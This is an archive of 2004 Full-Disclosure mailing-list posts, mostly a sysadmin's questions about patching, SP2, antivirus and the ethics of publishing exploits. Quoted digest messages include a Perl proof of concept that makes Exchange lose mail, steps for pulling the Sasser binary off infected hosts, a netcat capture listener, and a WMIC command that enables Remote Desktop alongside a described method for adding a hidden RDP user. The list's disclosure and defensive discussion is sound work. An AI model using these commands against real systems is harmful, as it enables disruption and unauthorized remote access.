|On Wed, 6 Oct 2004 05:03:45 -0700, Gregory Gilliss |[EMAIL PROTECTED] wrote: | Great, Not that I'm any fan of spyware, but this is just |another law | against hacking. Think - what's the difference between this and | someone using XSS to take control of a computer? If you |r00t a box | and deface the home page, then you've broken this law. | | sigh Instead of fixing the problem (poor software |security) we pass | laws to punish the people who do the things that |illustrate the problem. | Basic philosophical differences, blah blah blah ... | | Worst of all, do you really think that the spyware rackets |will slow | down or cease because of this? Nope - they'll just migrate |out of the jurisdiction. | | -- Greg |End of Full-Disclosure Digest | I guess one has to decide if browser hijacking is not the taking of personal property. I for one do not fine it amusing to open my browser and it has been redirected to a hijacked page as my new Homepage! If this law would allow me...the user to bring down hell upon these people then I'm all for it. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs
|--__--__-- | |Message: 14 |Date: Wed, 6 Oct 2004 15:53:32 -0700 |From: GuidoZ [EMAIL PROTECTED] |Reply-To: GuidoZ [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] Quick JPEG/GDI test fix (timesaver) | |Hello list, | |I wrote a very simple program/batch file that tests for the JPEG |exploit, then if affected, provides instructions on how to patch the |exploit. It has been tested on my own lil happy lab network, as well |as one one network where I'm a sysadmin. (Tested on Windows XP Home |and Pro, SP1a and SP2.) | |It DOES test for the exploit by attempting to use an infected JPG |which downloads the instructions for fixing it, if exploited. By |viewing the strings in the JPG, you can see the file it downloads and |check it out for yourself. It's clean. =) Just contains a batch file |and a program to launch the batch file. (The file that gets |downloaded |is a simple SFX.) Links are below. It contains a warning saying it's |about to try to exploit the system and to save data in open programs. |(It also warns that Explorer may crash.) | |I wrote this merely to save myself time and allow friends/family to |test their own systems, then patch them without having to call me for |help. It's not been tested in every environment and in every |scenario. |If you find a problem, feel free to email me (exploit _AT_ guidoz |_DOT_ com) Obviously I'm not responsible if it's abused |somehow, or if |it breaks something, etc. Feel free to modify it to suit your own |needs, but use it at your own risk. | |Test can be downloaded from here: |http://www.guidoz.com/exploit-test.exe | |Again, it's just an SFX archive with a batch file. Hopefully it will |save someone else some time. I've used it to have friends/family (and |a few clients) patch a total of around 30 machines without problems. | |-- |Peace. ~G | | |--__--__-- | |End of Full-Disclosure Digest | Well, guess I'm safe. McAfee saw it as Exploit-MntRedir.gen and said...NO! I googled it and it found nothing though. Thought it would atleast lead me to McAfee. McAfee search said: We found no records matching the following criteria: Virus name containing MntRedir.gen. Please try narrowing your search by using fewer characters. What gives? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE:[Full-Disclosure] XP Remote Desktop Remote Activation
Would access to command shell be accomplished via the recent ZoneID hole if such Administration password access is not available? Or perhaps even with the launching Of the MS04-028 exploit? Of course any Terminal usage on home pc's are noticed because users are locked out. Now terminal servers are a differnet story but user intervention is still needed. thank you Randall M |--__--__-- | |Message: 3 |Date: Fri, 1 Oct 2004 23:50:45 -0500 |From: Fixer [EMAIL PROTECTED] |Reply-To: Fixer [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] XP Remote Desktop Remote Activation | |--=_Part_505_31077403.1096692645033 |Content-Type: text/plain; charset=US-ASCII |Content-Transfer-Encoding: 7bit |Content-Disposition: inline | |XP Remote Desktop Remote Activation | | |Information | |Windows XP Professional provides a service called Remote Desktop, |which allows a user to remotely control the desktop as if he or she |were in front of the system locally (ala VNC, pcAnywhere, etc.). | |By default, Remote Desktop is shipped with this service |turned off and |only the Administrator is allowed access to this service. It is |possible, however, to modify a series of registry keys that may allow |a malicious user who has already gained a command shell to activate |Remote Desktop and add a user they have created for |themselves as well |as to hide that user so that it will not show up as a user in the |Remote Desktop user list. The instructions for this are attached. |Additionally, I have listed a sample .reg file of the type that is |discussed in the instructions below. |_ | SNIP |--__--__-- | |Message: 6 |From: Dominick Baier [EMAIL PROTECTED] |To: 'Fixer' [EMAIL PROTECTED], |[EMAIL PROTECTED] |Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation |Date: Sat, 2 Oct 2004 17:43:11 +0200 | |if you have an administrator password for the machine you |can just use WMIC |to turn remote desktop on. | |wmic /NODE:Server /USER:administrator RDTOGGLE WHERE |ServerName=Server |CALL SetAllowTSConnections 1 | |End of Full-Disclosure Digest | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: horse before cart...I take it back
Sorry for my stupidity and too quick response. After careful study I see its the .DLL only. This exploit has me too excited! I am impressed though with how quick the response to this has been. I have heard of view incidents. My own ISP has finally implemented protection even from those files recieved from the list. Personally I know of a high school here in Missouri that had to shut down internet access due to this so they claim. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] WinXP Application Layer Gateway Service
Is there anything fishy about this service performing background FTP request? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE:[Full-Disclosure] How to obtain hostname lists
Fab, One kewl way is to open a website like Nakedladies.com and log all the visiting IP's! Kewl huh! Do you need someone to write some code also? thank you Randall M |--__--__-- | |Message: 4 |Date: Tue, 28 Sep 2004 09:32:37 -0600 |From: fabio [EMAIL PROTECTED] |To: Full-Disclosure [EMAIL PROTECTED] |Subject: [Full-Disclosure] How to obtain hostname lists | |Hi. | |I would like to know what techniques can Intruders use to |obtain a lists of hostname and attack them with exploits code? |For example, a huge list like: |www.foo.com |www.bar.com | |And so on. Also, they can have a lists with certain criteria |in common (os, httpdver) and do a more selective attack. I |want to know how they can obtain hostnames asnd create a |huge database for potencial host victims? | |Thanks in advance. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Need layman terms for jpeg exploit
Would some kind soul explain the total workings of the exploit in layman terms? Things like how it Is used, how the user is xploited, what's common about the jpeg code that must be Used, etc., etc. thank you in advance Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
What exactly would one gain by creating a PoC on this exploit? How exactly does this compare to meaningful disclosures that were revealed because someone would not listen or ignored the warnings of their security vulnerability. I mean, this is nothing like a program goof that allows clear-text Passwords or exposes files or the like. This exploit (if it can be called that) took a lot of thought to create it and exploit it. Correct me if I'm wrong but it does not fall in to the category of exploit as defined by this list. This was truly a created Exploit that would not be their otherwise. This took intelligent input. This is nothing more then a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list. |--__--__-- | |Message: 13 |From: i.t [EMAIL PROTECTED] |Organization: i.t consulting |To: [EMAIL PROTECTED] |Date: Sun, 26 Sep 2004 11:57:33 +0200 |Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn | | | On Saturday 25 September 2004 16:59, raza wrote: | I just compiled this and it works well.. | | ... | yes and it works very well. | I can see this ones gaana be fun... | We'll have a worm within days. | |for nearly all of my clients using win xp I've deinstalled |win messenger. |one urgently wanted it back for communicating in real-time; |and, of course, |it's much more fun seeing a live picture of the |counterpart(s) in the chat |window... | |even having installed sp2 and the newest patches plus AV I |can imagine a virus |spreading within those pictures throughout the whole msn and so on... |any other defense? |or ist this too much paranoia? | |i.t | | |--__--__-- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [Full Disclosure] *HACKERS COSTING ENTERPRISES BILLIONS
A report issued by Symantec found that: The average time period between the disclosure of a vulnerability and its first exploit by hackers collapsed from several weeks in past reports to less than six days in the first half of 2004. 'In some cases, we saw global exploits in less than two days,' said Weafer. The current report finds that the vast majority of those vulnerabilities were moderately to highly severe and nearly 40% were associated with Web applications. This and some other findings from it's Internet Security Threat Report. See Security Wire Perspectives, Vol. 6, No. 72, September 20, 2004 for this and other related Material. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access
Gentlemen, I'm a little lost now on the intent of the original post. I believe it was intending to say that IBM computers arriving with XP installations have blank default Administrator passwords. I install about three fresh installs of XP and four pre-installs on HP laptops a week. The retail version always asks for a password for the local Administrator account and a user name. XP pre-installations require a user name and no mention of Admin account though its there by default with no password. Both by default give the user local administrator rights. Once installed I have to go to the accounts area and supply the passwords. If I join these to the domain I must supply a password. I've done it this way for two years and nothing has changed. It seems then the IBM and HP by pass what fresh retail installations do, and that is allow the opportunity to supply a password for the local administrator. This would be then their problem. Retail version warns but allows blank passwords. This would be the XP problem. I take full responsibility for any mistakes above. It's late. I'm tired and doing so many it does become mind numbing. But I believe this is an accurate account of the installations. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ZIP Attachment
Nick, have some coffee, it'll be ok! :) thank you Randall M + --__--__-- Message: 10 Date: Sun, 19 Sep 2004 21:39:03 +1200 From: Nick FitzGerald [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] ZIP Attachment To: [EMAIL PROTECTED] Reply-to: [EMAIL PROTECTED] Organization: Personal account GuidoZ wrote: I'm well aware that a filename usually isn't a very useful tools when blah, blah, blah... Your first post was a total waste of bandwidth, this one doubly so. Your two minutes at Google were not worth the list's time and resources, yet after having the blindingly obvious pointed out to you, you had to compound that by posting a wacky justaficashun of your originally pointless message. Regards, Nick FitzGerald ++= ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [Vmyths.com ALERT] Hysteria predicted for 'JPEG and windows update
I'm curious if anyone else noticed that the patch to fix windows only takes you to the SP2 update. We don't want the SP2 update because we have not fully tested this against our office and accounting software. I tryed on three different machines and each time the windows update for critical or custom only allowed me to get the SP2 update, nothing else. Did I read wrong? Did they not issue a patch? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (Full-disclosure) SP2 and McAfee. Has the final release been resolved?
With the SP2 RC1 McAfee could not update dats. Framework could not start. Had to set settings manually. Has this been fixed in the final version? the settings: To fix Virus scan 7.0 *Run dcomcnfg from the DOS prompt Select Component Services Select My Computer Open DCom config folder Click no on the pop up dialog if it appears. Select Framework Services Right click on properties and select Security tab. Change Launch to Use default. Click on Apply. Close the windows Run Update thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FullDisclosure: CWS removal tools
I haven't seen all the threads on this but there is a tool called CWShredder. It was created to combat CWS. Unfortunetly, the author was a student and it seems no longer can support it. I just attempted to find it somewhere else because his links seem down. At work I use it all the time to clean the computers. Worked wonders. Guess I'll cherish my tool until it becomes absolete. I found one link that still works but not sure if it updates anymore. http://www.aluriasoftware.com/tools/cwshredder.zip . Here is some other useful links http://www.safer-networking.org/minifiles.html thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure antisemtism, -Steer it a bit back on topic-
Maarten,all, I might add that security is a big part of this subject considering cyber-war being implemented From both sides. thank you Randall M |--__--__-- | |Message: 6 |From: Maarten [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: Re: [Full-Disclosure] antisemtism, FD and bandwidth |- what I want out of it |Date: Thu, 22 Jul 2004 14:03:20 +0200 | |On Thursday 22 July 2004 13:07, Harlan Carvey wrote: | | Consider this...this is a public list and people will | knowing post off-topic. Sometimes they'll even say, | hey, this is off topic. Now, what would happen if | you were sitting around having a couple of beers w/ | your buddies and a friend of yours walked up and just | started talking about something that hand nothing | whatsoever to do with what you and your buds were | talking about? Would you be the one to do that to | your friends? How about a group of strangers? | |Except that in that social context you cannot really say there is no |moderation. Moderation will not be official, sure, but body |language, |awkward looks and maybe a wisecrack or two will most of the |time quickly shut |up that person. Or they will continue their conversation in |a smaller |circle, all things that are impossible or at least difficult |to do on a ML. |On a mailinglist you can continue off-list, but that is a one-to-one |conversation, not a fork like you can have in your bar scenario. |Also, if the guy won't stop jabbing, you can all start to |leave and continue |elsewhere. This doesn't happen on mailinglists, or at the |very least it is a |process that takes months to complete, instead of seconds. | |To steer a little bit back to on-topic, can we conclude that |all computer |systems in israel and the surrounding palestine territories |are insecure ? |Because, since all real security begins with _physical_ |security, one can |easily argue that all those systems are notorously insecure. ;-) | |Maarten | |-- |Yes of course I'm sure it's the red cable. I |guarante[^%!/+)F#0c|'NO CARRIER | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability
So are there any problems or complications for enterprises when applying this patch? thank you Randall M Message: 3 Date: Fri, 02 Jul 2004 12:36:03 -0400 From: William Warren [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability http://support.microsoft.com/default.aspx?kbid=870669 http://support.microsoft.com/default.aspx?kbid=870669 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Successful in blocking all known exploits
After a number of years, much thought,and long nights I have developed a systematic method to prevent and thwart exploits on my system! NEVER REBOOT! I have been up and running for 876 days straight and have had no problems to date! thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Apology: Was Multiple Scanning Engines
I do sincerely apologize for offending those who felt this was not the place to ask such a question. I felt though that there was no better place then a place where the recipients were of high caliber and knowledge. A Google search would have only given me advertisements of We're the best type. For those who through kindness answered I thank you so much. --__--__-- Message: 4 Date: Sun, 27 Jun 2004 11:29:38 +1200 From: Nick FitzGerald [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] multiple scanning engines To: [EMAIL PROTECTED] Reply-to: [EMAIL PROTECTED] Organization: Personal account RandallM [EMAIL PROTECTED] wrote: I looking for something that can utilize multiple scanning engines to place above our mail servers. Any suggestions? Precisely how is this a security vulnerability disclosure issue? Securityfocus has a focus-virus list and there are many other fora around the web for discussing whose antivirus is best type issues... Please, no-one else reply to this _on list_. -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 --__--__-- thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] multiple scanning engines
Hi, I looking for something that can utilize multiple scanning engines to place above our mail servers. Any suggestions? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, SP2 Problems
Jelmer made this really neat statement: |--__--__-- | |Message: 5 |Date: Mon, 07 Jun 2004 04:17:28 +0200 |From: Jelmer [EMAIL PROTECTED] |Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary |code | (An analysis of the 180 Solutions Trojan) |To: 'Chris Carlson' [EMAIL PROTECTED] |Cc: [EMAIL PROTECTED] | |I haven't installed SP2 yet since I heard a lot of complaints from people |who claimed it caused instability, it had memory management issues, some |drivers didn't work, security measures a bit too much in your face etc | |But I reviewed the list of changes sometime back and I concur, it looks |very |promising, I think in the near future an IE exploit will be a rare |occurrence as opposed to a bi weekly event | |End of Full-Disclosure Digest My reply: I have the sp2 after attending the Security Summit 2004. I loaded this on my test laptop. Glad I did. I would have been very pissed if I had loaded it on anything else. First off, if you have McAfee or Norton you no longer are able to update using auto. It for sure is for the home user. If you're expecting something that you can have a little more control over this is not for you. One thing that I was afraid of and concerned me due to my mobile users was the ability to use VPN. It works well and does give you options to select services for each connection you use. It did not recognize my virus program being loaded nor give me the option to point to it. I think that's due to the McAfee incompatibility in someway I did look for a fix and found this but haven't tried it yet: __ The McAfee framework issue is solved easily. Administrative Tools Component Service DCOM conf Framework service Right-click - properties Set the launch and access permission to Default Restart pc. McAfee will update properly. Seems to be an error in the McAfee installer Then of course there seems to be a slue of areas from web programs to a warning from Microsoft that SP2 will break and disrupt existing applications unless specific code rewrites are made at the developer end. http://www.internetnews.com/ent-news/article.php/3322381 I'll test the above for McAfee fix and see if that works. Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] xabot or sdbot or spybot...
--__--__-- Message: 21 Date: Fri, 04 Jun 2004 00:08:23 +0200 From: Axel Pettinger [EMAIL PROTECTED] Organization: API To: Perrymon, Josh L. [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? Perrymon, Josh L. wrote: I found this worm/ trojan on a laptop. Ran FPort and found the .exe. Doesn't look like it propagates to other machines but rather communicates with a compromised web companies server using IRC. The compromised server has removed the IRC service. Only sends RST packets back. snip I would like to know the attack vectors. I'm guessing LSASS. AntiVirus scanners identify our trojan as: BitDefender : Backdoor.SDBot.Gen Kaspersky : Backdoor.Rbot.gen McAfee : W32/Sdbot.worm.gen.g Symantec: W32.Spybot.Worm Trend Micro : WORM_SPYBOT.AP From a quick look at the file I'd say the following is the best description of that trojan. There're several attack vectors ... http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT .APVSect=T Regards, Axel Pettinger I'd like to throw something in here. While scanning with Spybot 1.3 it came to a halt with an error. The error was an Xabot error. After many attempts to figure this out I searched Xabot. This lead to Symantics site http://securityresponse.symantec.com/avcenter/venc/data/w32.xabot.worm.html and http://www.sophos.com/virusinfo/analyses/w32sdbotna.html where it is associated with Sdbot. Well, for sure I am having a hell of a time finding it as all conventional means have failed. 3 online scans. 3 scans in safe mode. Hijack This, Swat-it, Bazooka and still Spybot is halted with the error. I uninstalled Spybot three times. It seems I have a remnant somewhere. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1675 - 32 msgs
Yo! Skylined, don't hold back, tell us how you really feel! |Message: 30 |From: Berend-Jan Wever [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: Re: [Full-Disclosure] lists, autoresponders, and netiquette |Date: Fri, 28 May 2004 03:42:40 +0200 | |Every time I post to a list I get these out of office auto-responses. |Can these responders be configured to not respond to stuff from a list? | |-Michael | |Yes, they can... and no, they won't. Too much shit-for-brains dumb-ass |good-for-nothing mofo's on the list for that. Why the hell do you think |every none informative troll thread is repied to at least 30 times? |That's |just because there are more people subscribed that get a hard on from |annoying people (or are just plain stupid) then there are that get a hard |on |from actually contributing something. | |As a matter of fact I'm just replying because my girlfriend broke up with |me |and I'm drunk, else I wouldn't even bother: I just felt like being a |shit-for-brains dumb-ass good-for-nothing mofo. | |Cheer, |SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Remember the subject about posting the exploit?
Well, concerning the German Teenager who is responsible for releasing sasser, Mitnick states: He was no great technical expert. There was a published vulnerability and he took his worm and used his exploit code to be able to propagate it in the many systems that Sasser touched. http://www.zone-h.com/en/news/read/id=4245/ Just my point justified. A more protective measure must surely exist? Like I said before I play counter strike. The kids 12-18 years old on there know c+ like the back of their hand and brag about which university there bots got into that day and the number of bots they own. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure New therad: sasser, costs, support etc alltogether
QUESTION: If a tree falls in the woods where no one is around to hear it does it make a sound? If there wasn't someone looking for bugs or exploits would there be any? In a perfect world this list wouldn't exist. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so lets post how
I am using the following only as an example that has been slightly discussed here. The gentleman rightly posts and gives us the information that is very helpful to be aware of. But then posts the exploit example because, in his own words, |I think some people know how to use this FEATURE ... I hope this post |will speed up the fix release! Exactly in what way do you think this should speed up the release? Granted, this is a lost email exploit. But what if it was a dangerous exploit? I have seen these also posted. I know of script Kiddies who would never be able to find the exploit but are part of the group who know how to use this 'FEATURE' They watch here and others just for that purpose. Where is accountability? I am torn between this issue of needed knowledge and exposed exploit. As a network Administrator I have no need for the exploit but for the knowledge. I have found no better place then here for that. Then on the other hand you all give out the exploits for confirmation which is needed also. Just some of my personal inward ramblings. thank you Randall M |--__--__-- | |Message: 20 |Date: Wed, 12 May 2004 11:52:23 +0200 (MEST) |From: [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] MS Exchange message lost | |* MS Exchange duplicate message fault (message lost) |* |* MS Exchange (all versions affected) duplicate message fault |* |* I discovered this bug independently on 10, 2003 |* |* public post 05, 2004 |* |* Helmut Schmitz [EMAIL PROTECTED] |* |* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */ | |MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send |Messages with long message ids (189 bytes?)to more than one recipient |(cc), |the message will not delivered correctly ... there is no correct logging |!!, |the messages will be delivered to only one Recipient ... the message to |the |other will be lost !! | |I have send this issue to Microsoft (10.2003) ... some months later |(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with |some reg settings fixes (workaround ;-) the problem. | |Perl Example (test exploit) ... | |#!/usr/bin/perl -w |use Net::SMTP; |$from = '[EMAIL PROTECTED]'; |$to = '[EMAIL PROTECTED]'; |$cc = '[EMAIL PROTECTED]'; |$subject = 'Test Email'; |$smtp = Net::SMTP-new('yourmailserver'); |$smtp-mail($from); |$smtp-to($to); |$smtp-cc($cc); |$smtp-data(); |$smtp-datasend(To: $to\n); |$smtp-datasend(Cc: $cc\n); |$smtp-datasend(From: $from\n); |$smtp-datasend(Subject: $subject\n); |$smtp-datasend(Message-ID: |veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte |ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng |eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei |feejktmhedgedherngrondljzhng \n); |$smtp-datasend(Hallo\n); |$smtp-datasend(123\n); |$smtp-datasend(123\n); |$smtp-datasend(123\n); |$smtp-dataend(); |$smtp-quit; | |Background: |Duplicate detection is decided by three factors. These are MessageID, |RootFID (the root folder ID of the mailbox) and the SubmitTime into the |store. These are used to build a unique key when the message is |submitted. |If all the factors are the same value, then we recognize the message as |duplicate. | |### | |I think some people know how to use this FEATURE ... I hope this post |will speed up the fix release! | |Regards, |Helmut Schmitz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Registry Watcher
Hi, Any programs out there that watches changes to registry and can give an alert? My intention for this is only because of my limited knowledge of the windows registry. As I understand, no processes, applications, programs run with out entries in to the registry. This it seems includes virus and Trojan installations. There are the common entries that belong in the registry that the common installation inserts and all programs have values that must be inserted. If a watcher would have a data base to follow and any odd or uncommon entries could be flagged. As far as I know all newly found viruses insert registry entries and these could be placed in a data base that would cause registry to deny and flag. Wouldn't this in a sense be a firewall and virus protection method or am I really off base in my understanding. I know that such use is used by AdWatch and other types of tools but I have never seen anything mention for protection against backdoors, Trojans and viruses. If such a program does not exist I'd appreciate any input on building one. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Catching Sasser
Hot dam, can't wait to get to work and try this on our network! |--__--__-- | |Message: 19 |From: Shashank Rai [EMAIL PROTECTED] |Reply-To: [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Organization: Etisalat NIS |Date: Tue, 04 May 2004 11:40:12 +0400 |Subject: [Full-Disclosure] Catching Sasser | |Hi all, |for people who did have not the priviledge of getting infected with |sasser ;) because of firewall/AV/patch or they are smart enough to use |Linux (like me hey now no flame war on this *please*), here is a |simple way to catch sasser: | |Step 1:Scanning for infected machines (from a Linux box): |- |Get doscan from:http://www.enyo.de/fw/software/doscan/ | |compile n run: |# doscan -A 50 -b 512 -c 100 -i -p 5554 -P tcp -r 200 OK$ -v IP |RANGE | |This will give you list of infected machines. | |Step Two: Getting the virus |--- |Copy the following set of commands into a file (or type them from ftp |prompt): |-ftp_commands-- |open infected m/c IP 5554 |anonymous |user |bin |get 7584_up.exe |bye |-- |then from cmd prompt of your *windows* machine, run: | |c:\ftp -s:ftp_commands | |This will fetch you a copy of the virus as 7584_up.exe. |The ftp_commands, actually logs into the ftp server of sasser on port |5554 of the infected machine with username anonymous and password |user, and then issues a PORT command to download the virus. | | |PS: USE THESE SET OF INSTRUCTIONS AT YOUR OWN RISK By EXECUTING THE |DOWNLOADED FILE YOU WILL INFECT YOUR SYSTEM. | |In case you are running any AV with real-time protection features, it |should immediately detect the virus!!! | |cheers, |-- |Shashank Rai | |Network and Information Security Team, |Emirates Telecommunication Corporation, |Abu Dhabi, U.A.E. |Ph: +971-2-6182523 Office |+971-50-6670648 Cell |GPG key: |http://pgp.cns.ualberta.ca:11371/pks/lookup?op=vindexsearch=0x01B7947402 |6E36F5 | | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure YOU know what blows me away.
You know what blows me away. People who can in one breath write the info like youssef below and what other on this list have written. And that most of you are probably not older then 25yrs old. You hacked your first box when you were 2 and flunked kindergarten class because your teacher didn't know C. Man if I could get this list to write a book what a treasure it would be. I play CounterStrike on hacking servers and it blows me away that some of these 14yr olds are writing in C+ to code their own hacks. You know what I did when I was 14? I don't. G.I Joes humping my sister's Barbie's I guess. |--__--__-- | |Message: 14 |Date: Mon, 3 May 2004 17:58:04 +0200 (CEST) |From: youssef ALAOUI [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] Unpacking Sasser | |HI, | |You can use PEiD to try to unpack Sasser (http://peid.has.it/) | |you can also catch this worm by creating a shell script called catch.sh | |catch.sh would contain two lines : | |nc -l -p 445 ~/catched.dump$$ |./catch.sh | |then you just have to launch it : ./catch.sh | |that will create files with random names for each incomming connexion to |port 445 containing a dump of the trafic in your home directory. | |Tek Rulez | | |ALAOUI ABDELLAOUI Youssef alias ANALYSTE |Delegue Promo 2008 |-{Epitech}- European Institute of Technology | | | |--__--__-- | |___ |Full-Disclosure mailing list |[EMAIL PROTECTED] |http://lists.netsys.com/mailman/listinfo/full-disclosure | | |End of Full-Disclosure Digest ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, new LSASS - Javier
Javier, Boy are you hitting the head on the nail. There I was getting ready to patch all the machines I could that day (I had posted here about getting help in that direction a man's gotta patch) and while I had a cd in my hand getting ready to insert it, up popped the LSASS Vulnerability error and restart in 60 seconds! Well, I shut it down, booted with no network and patched and everything came out ok. Whew! |--__--__-- | |Message: 4 |Date: Mon, 03 May 2004 10:45:35 +0200 |From: Javier Fernandez-Sanguino [EMAIL PROTECTED] |Organization: Germinus |To: Ben Ryan [EMAIL PROTECTED] |CC: [EMAIL PROTECTED], [EMAIL PROTECTED], | [EMAIL PROTECTED] |Subject: [Full-Disclosure] Re: New LSASS-based worm finally here (Sasser) | |Ben Ryan wrote: | | As expected, LSASS exploit-based worm seems to have arrived. Fasten |your | seatbelts, those unpatched please use the spew bags provided :) | I hope PSS resolves the issues discussed in KB835732. | |What's more disturbing is that this worm has established a new record |for Microsoft worms [1]. Blaster was the fastest worm (25 days since |the patch was published to the worm), this one has been even faster |(17 days for the first variant since the patch was published to the |worm). Of course, I'm not considering the fact that this issue was |known, at least to eEye and Microsoft, for over 5 months. | |Regards | |Javier | |[1] Approaching the record of worms in other OS, which, I believe, is |held by Scalper (10 days from patch to worm). But hey, they could |browse the source changes for that one. | | |--__--__-- | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ Full-Disclosure] A mans got to patch
thank you Randall M To my mentors: Let me first give a short history to my situation. I work for a company that began 10ys ago with three Mac servers and about 25 Mac workstations. 10 years later they have 34 servers, 345 PC workstations and 60 G4/G5 Macs in 5 locations around the USA. I have been in the IT area for one and half years. I have worked for this company for one year. Patching was not done as needed due to the growth and continuous requirements put on the two Techs. For the last three days I have seen what I believe to be Agobot exploits (searching on names found in the registry were said to be associated with such). I have been reading this list for about three weeks now. I have become more aware of dangers that await. Frankly I'm scared to death :) I want to begin the tedious task of patching the servers and workstation and can think of no better place then here to get some what I feel would be very expert advice on doing this in the best fashion. Our current environment: Moved to AD Domain this year. Have yet a mix member server environment with some of the NT's still with Explorer 5.5 (I can hear some here thinking give me your IP! :) ). I have gone through some of the servers with Microsoft security scanner and with some I simply went to the update area. Many had never visited there before as the initial visit loads the scanner engine. The weakness here is norm for the workstations also. We do tape backups nightly. Some of our main problems are the programs that are still used can't be repaired easily, such as, Dynamics. Also some servers are running programs that we could never place back on because they had to be sent off to be loaded by the experts of the software companies. Another example is the web server with is hanging on by a thread. They paid nearly $175,000 8 years ago for their online presence. That is no longer supported and we don't know a dam thing about it except to keep it going! So here you see my need. My guess is that I have to know something of the risks with certain patches so as not to get myself in trouble loosing sensitive material and such not to mention my job for pushing for this to be done. I don't see this as a simple visit to window update. Your advices would be greatly appreciated. I don't mind say I'm scared to death. Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] no more public exploits: just a n00bie view
